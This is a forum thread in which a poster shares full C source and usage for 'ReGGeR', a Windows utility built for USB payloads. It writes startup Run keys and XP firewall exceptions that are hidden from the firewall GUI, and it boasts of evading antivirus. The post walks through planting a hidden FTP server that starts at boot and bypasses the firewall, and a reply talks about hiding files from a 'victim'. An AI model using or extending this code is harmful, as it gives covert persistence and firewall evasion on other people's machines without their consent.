ReGGeR

[sablefoxx]

ReGGeR v1.0

About:
Basically this is my first attempt to write a (somewhat) useful app all in C/C++ that accepts command line arguments, so if the codes a little sloppy that's why. Basically what this program does is, given a file (such as C:\file.exe) it will add the file (via registry key) to start up with the system, or (if in XP) will add the file to the firewall exception list (very useful for USB payloads).

Features:
- Easily add startup regkeys (XP/Vista/Win7).
- Easily add firewall regkeys (XP Only).
- Firewall keys are automatically hidden from the firewall GUI.
- This program writes directly to the registry so you can add keys even if Regedit is disabled by the admin (assuming you still have write access to the dir).
- Can also create .reg files
- 0% Virus Detection Rate

Examples:
Small file size makes it perfect for USB payloads (why i'm posting it here). For example if you wanted to have a hidden FTP server start everytime the computer turned on, and bypass the filewall all you'd need to do is;

copy .\hidec.exe C:\
copy .\ftpdmin.exe C:\
regger.exe -xpfw C:\ftpdmin.exe ftp
regger.exe -startup "C:\hidec.exe ftpdmin.exe" ftpexec

Notes:
- If system is running Vista, and has UAC enabled you need to run the program with admin rights
- If you find any bugs, or suggestions for new features please post them!

Download:
ReGGeR v1.0 - 5/12/09
Dev-C++ (Used to Compile)

Source ( .c file included in download above ):

/*************************************************************
  Name: ReGGeR
  Copyright: Fuck that shit
  Author: SableFoXx
  Description: Easily add firewall and startup regkeys
  Version: 1.0
**************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define FN_MAX 255 /* Max file name length, ntfs is 255 */
#define N_STARTUP "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
#define N_XPFW "System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List"

void error(int);

int main(int argc, char * argv[])
{
    void xpfw(char* argv[]);
    void strtup(char* argv[]);
    void make_file(char* argv[], int fn);
    int  filexist(char* argv[]);

    if(argc < 4  || 5 < argc) /* Check for correct number of args */
        {
        if(argc != 2)
             {
             error(1);
             return 0;
             }
        }
    if(strcmp(argv[1], "/?") == 0 || strcmp(argv[1], "-help") == 0 || strcmp(argv[1], "/help") == 0)
        {
        error(0);
        return 0;
        }
    if(argc > 4)      
        if((strcmp(argv[4], "-mk")) == 0)
            {
            int fn;
            if((strcmp(argv[1], "-startup")) == 0)
                fn = 1;
            else
                fn = 0;
            make_file(argv, fn);
            return 0;
            }
        else
            {
            error(2);
            return 0;
            }
    if((strcmp(argv[1], "-xpfw")) == 0)
        {
        FILE *xp;
        if ((xp = fopen("C:\\WINDOWS\\System32\\wupdmgr.exe", "r")) == NULL )
            {
            error(4); /* Non-XP System */
            return 0;
            }
        filexist(argv);
        xpfw(argv);
        }
    else
        {
        if((strcmp(argv[1], "-startup")) == 0)
            {
            filexist(argv);
            strtup(argv);
            }
        else
            error(2); 
        }
    return 0;
}

void xpfw(char* argv[])
{
    HKEY hKey;
    char path[FN_MAX];
    char name[FN_MAX];
     
    strcpy(path, argv[2]);
    strcpy(name, argv[2]);
    strcat(path, ":*:enabled:@xpsp2res.dll,-22019"); //hide from gui

    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, N_XPFW, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS)
        {
        RegSetValueEx(hKey, name, 0, REG_SZ, (const unsigned char*)path, sizeof(path));
        RegCloseKey(hKey);
        }
    else
        error(3);
}

void strtup(char* argv[])
{  
    HKEY hKey;
    char path[FN_MAX];
    char name[FN_MAX];
     
    strcpy(path, argv[2]);
    strcpy(name, argv[3]); 
    
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, N_STARTUP, 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS)
        error(3);
    else
        {   
        RegSetValueEx(hKey, name, 0, REG_SZ, (const unsigned char*)path, sizeof(path));
        RegCloseKey(hKey);
        }
}

int filexist(char* argv[])
{
    FILE *find;
    if ((find = fopen(argv[2], "r")) == NULL)
        {
        printf("\nWARNING: File does not exist, continuing...");
        return 1;
        }
    else
        {
        fclose(find);
        return 0;
        }
}

void make_file(char* argv[], int fn)
{
    void print_path(char path[], int fn);
     
    FILE *out;
    char path[FN_MAX];
    strcpy(path, argv[2]);
   
    if(fn == 1) /* Header */
        {
        out = fopen("startup.reg", "w");
        fprintf(out, "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n");
        fprintf(out, "\"%s\"=\"", argv[3]);
        fclose(out);
        print_path(path, 1);
        out = fopen("startup.reg", "a"); 
        fprintf(out, "\""); /* Suffix */
        }
    else
        {
        out = fopen("xpfw.reg", "w");
        fprintf(out, "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List]\n\"");
        fclose(out);
        print_path(path, 0); /* Name must be same as path for firewall keys */
        out = fopen("xpfw.reg", "a"); 
        fprintf(out, "\"=\"");  /* Quick Write "=" */
        fclose(out); 
        print_path(path, 0);
        out = fopen("xpfw.reg", "a"); 
        fprintf(out, ":*:Enabled:@xpsp2res.dll,-22019\""); /* Suffix */
        }
    fclose(out);
} 


void print_path(char path[], int fn)
{
    FILE *out;
    if(fn == 1)
        out = fopen("startup.reg", "a");
    else
        out = fopen("xpfw.reg", "a");
    int cnt = 0;
    int max_index = strlen(path) - 1;
    while(cnt <= max_index) /* Print Path */
        { 
        if(path[cnt] != 92)   /*  92 is ascii for '\'  */
           fprintf(out, "%c", path[cnt]);
        else
           fprintf(out, "\\\\");
        cnt++;
        }
    fclose(out);
}

void error(int err) /* Error Codes */
{         
    switch(err)
        {
        case 1 : printf("\nUSER ERROR: Wrong number of arguments\n"); break;
        case 2 : printf("\nUSER ERROR: Mode does not exist\n");  break;
        case 3 : printf("\nPERMISSIONS ERROR: Unable to open parent registry key"); break;
        case 4 : printf("\nUSER ERROR: Non-Windows XP operating system in use\n");  break;
        default:                /* Display Usage*/
                 printf("\n     * Version 1.0, By SableFoXx *\n");
                 printf("\n Regger.exe [mode] [file] [name] [make]");
                 printf("\n     [mode] -startup  Add startup key (XP/Vista/Win7)");
                 printf("\n            -xpfw     Add firewall exception key (XP Only)");
                 printf("\n            -help     View this message");
                 printf("\n     [file] C:\\path\\to\\file.exe");
                 printf("\n     [name] Name of registry key being created");
                 printf("\n     [make] -mk  Create a .reg file (Optional)");
        }           
}

[LizardKing]

Nice piece of code, have to check it out!

I needed something like these so I could modify the registry keys so that the victim is not able to display hidden files in folders :D

I'll try it and let you know how it works!

[sablefoxx]

Nice piece of code, have to check it out!

I needed something like these so I could modify the registry keys so that the victim is not able to display hidden files in folders :D

I'll try it and let you know how it works!

not a bad idea, i may have to add that. been thinking about other regkeys i can through in